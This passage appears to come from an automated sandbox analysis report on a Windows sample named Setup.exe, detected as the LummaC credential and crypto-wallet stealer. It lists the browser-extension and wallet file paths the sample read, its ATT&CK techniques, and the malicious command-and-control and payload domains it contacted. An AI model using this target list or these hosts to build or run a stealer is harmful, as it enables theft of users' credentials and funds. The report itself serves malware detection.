              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1892472910.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6860, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		221
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information              		LSASS Memory21
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol31
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Setup.exe16%ReversingLabs
              Setup.exe9%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=%0%Avira URL Cloudsafe
              https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com0%Avira URL Cloudsafe
              https://cegu.shop:443/8574262446/ph.txt100%Avira URL Cloudmalware
              sloppymisskr.click0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txt/P100%Avira URL Cloudmalware
              https://sloppymisskr.click/b60%Avira URL Cloudsafe
              https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc=0%Avira URL Cloudsafe
              http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar0%Avira URL Cloudsafe
              https://sloppymisskr.click/apie0%Avira URL Cloudsafe
              https://sloppymisskr.click/apib0%Avira URL Cloudsafe
              https://sloppymisskr.click/apisp0%Avira URL Cloudsafe
              https://sloppymisskr.click/0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtf1100%Avira URL Cloudmalware
              https://vivporn.com/wp-content/plugins/0%Avira URL Cloudsafe
              https://sloppymisskr.click/apiy0%Avira URL Cloudsafe
              https://www.tomabo.com/mp4-player/download.html0%Avira URL Cloudsafe
              https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile0%Avira URL Cloudsafe
              https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em0%Avira URL Cloudsafe
              https://sloppymisskr.click/api0%Avira URL Cloudsafe
              https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c0%Avira URL Cloudsafe
              https://sloppymisskr.click/$0%Avira URL Cloudsafe
              https://cegu.shop/4Q100%Avira URL Cloudmalware
              https://www.hotmovs.com/0%Avira URL Cloudsafe
              https://sloppymisskr.click/apiW0%Avira URL Cloudsafe
              https://www.tomabo.com/videos/dog-and-balls.mp4Please0%Avira URL Cloudsafe
              https://cegu.shop/1B100%Avira URL Cloudmalware
              https://www.tomabo.comVersion0%Avira URL Cloudsafe
              https://sloppymisskr.click/panym0%Avira URL Cloudsafe
              https://cegu.shop//100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                sloppymisskr.click
                		104.21.90.109
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  sloppymisskr.clicktrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://sloppymisskr.click/apitrue
                  • Avira URL Cloud: safe
                  		unknown
                  rabidcowse.shopfalse
                    		high
                    wholersorie.shopfalse
                      		high
                      cloudewahsj.shopfalse
                        		high
                        noisycuttej.shopfalse
                          		high
                          nearycrepso.shopfalse
                            		high
                            https://cegu.shop/8574262446/ph.txtfalse
                              		high
                              framekgirus.shopfalse
                                		high
                                tirepublicerj.shopfalse
                                  		high
                                  abruptyopsn.shopfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://cegu.shop:443/8574262446/ph.txtSetup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.redtube.com/videohttps://www.thumbzilla.com/Thumbzillathumbzilla.comthumbzilla.Setup.exefalse
                                          		high
                                          https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=%Setup.exefalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.comSetup.exefalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dfgh.online/invoker.php?compName=Setup.exe, Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044975990.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120702904.0000000003594000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045122596.0000000003593000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044550396.0000000003592000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094519509.0000000003591000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.yahoo.com/YahooSetup.exefalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type:Setup.exefalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Setup.exe, 00000000.00000003.1834178767.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822159529.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822224930.00000000035C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPleaseSetup.exefalse
                                                      		high
                                                      http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvarSetup.exefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://sloppymisskr.click/b6Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119539930.00000000007E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://ocsp.starfieldtech.com/0DSetup.exefalse
                                                        		high
                                                        https://sloppymisskr.click/apieSetup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cegu.shop/8574262446/ph.txt/PSetup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://www.txxx.com/Setup.exefalse
                                                          		high
                                                          https://sloppymisskr.click/apibSetup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc=Setup.exefalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://sloppymisskr.click/apispSetup.exe, 00000000.00000003.1892306082.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903114467.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0Setup.exefalse
                                                            		high
                                                            http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSetup.exe, 00000000.00000003.1822224930.00000000035A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://sloppymisskr.click/Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834336363.0000000003582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
